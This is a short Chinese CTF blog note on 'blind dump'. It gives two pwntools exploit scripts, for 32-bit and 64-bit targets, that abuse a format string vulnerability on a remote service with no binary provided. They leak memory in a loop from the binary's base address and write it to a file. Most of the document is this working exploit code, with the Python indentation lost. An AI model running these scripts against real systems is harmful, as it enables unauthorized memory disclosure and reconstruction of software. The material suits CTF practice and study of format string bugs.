blind dump
blind dump
主要是在遇到无二进制文件只有靶机的题目时,如果检测出来有格式化字符串漏洞就可以利用盲打脚本还原二进制文件从而进行漏洞利用
主要是32位和64位的脚本
32位:
#! /usr/bin/env python
# -*- coding: utf-8 -*-
from pwn import *
import binascii
r = remote()
def leak(addr):
payload = "%k$s.dump" + p32(addr) #这里的k要根据调试出来的偏移地址决定
r.sendline(payload)
print "leaking:", hex(addr)
r.recvuntil('xxxx')
ret = r.recvuntil(".dump",drop=True)
print "ret:", binascii.hexlify(ret), len(ret)
remain = r.recvrepeat(0.2)
return ret
# leak
begin = 0x8048000
text_seg =''
try:
while True:
ret = leak(begin)
text_seg += ret
begin += len(ret)
if len(ret) == 0: # nil
begin +=1
text_seg += '\x00'
except Exception as e:
print e
finally:
print '[+]',len(text_seg)
with open('dump_bin','wb') as f:
f.write(text_seg)
64位
import os
import sys
import time
from pwn import *
from ctypes import *
import binascii
begin=0x400000
bin = b''
s = lambda data :p.send(str(data))
sa = lambda delim,data :p.sendafter(str(delim), str(data))
sl = lambda data :p.sendline(str(data))
sla = lambda delim,data :p.sendlineafter(str(delim), str(data))
r = lambda num :p.recv(num)
ru = lambda delims, drop=True :p.recvuntil(delims, drop)
itr = lambda :p.interactive()
uu32 = lambda data :u32(data.ljust(4,b'\x00'))
uu64 = lambda data :u64(data.ljust(8,b'\x00'))
leak = lambda name,addr :log.success('{} = {:#x}'.format(name, addr))
l64 = lambda :u64(p.recvuntil("\x7f")[-6:].ljust(8,b"\x00"))
l32 = lambda :u32(p.recvuntil("\xf7")[-4:].ljust(4,b"\x00"))
p=remote()
#context(log_level='debug')
def leak(addr):
pl=b"%k$sdump"+p64(addr) #一样k要根据偏移确定
print(pl)
p.sendlineafter('xxxx',pl)
p.recvuntil(':')
data=p.recvuntil('dump',drop=True)
#data = p.recvrepeat(0.2)
return data
try:
while 1:
data = leak(begin)
begin = begin+len(data)
bin += data
if len(data)==0:
begin+=1
bin += b'\x00'
except Exception as e:
print(e)
finally:
print ('[+]',len(bin))
with open('dump_bin_64','wb') as f:
f.write(bin)
p.interactive()
主要是一个利用格式化字符串漏洞的函数不断循环,从起始地址开始泄露二进制文件的地址及内容,最后完了整理成二进制文件保存,会用就行,使用条件包括但不限于上面,还有本身靶机可以不断循环等等,实际可能没有了,看会不会在比赛里面出现吧。
浙公网安备 33010602011771号